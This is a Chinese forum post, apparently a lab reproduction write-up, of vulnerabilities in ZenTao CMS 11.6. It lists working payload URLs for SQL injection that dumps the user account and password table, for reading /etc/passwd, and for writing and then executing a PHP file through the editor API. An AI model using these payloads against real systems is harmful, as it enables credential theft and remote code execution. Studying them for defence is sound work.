蝉道 zentaocms漏洞复现

Track-mss   ·   发表于 2021-08-25 11:43:15   ·   CTF&WP专版

0x01 蝉道 zentaocms 11.6 漏洞复现

进入网站,选择开源版

查看版本
http://127.0.0.1/zentao/index.php?mode=getconfig

1、 sql注入

payload:
http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

2、 文件读取

payload:
http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

3、 代码执行

POST请求包发送数据

http://192.168.59.128/zentao/api-getModel-editor-save-filePath=/tmp/123

fileContent=<?php phpinfo()?>

(放在tmp下是因为其他目录可能有权限限制,不一定可以写进去)

查看文件,已被写入

访问123文件:

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123

没有成功,查看源代码,发现需要给物理路径加上一层才可以。

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/123/1

打赏我,让我更有动力~

1 Reply   |  Until 7个月前 | 619 View

zkaqzh
发表于 7个月前

这个是必须要登录才能进行sql注入吧

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.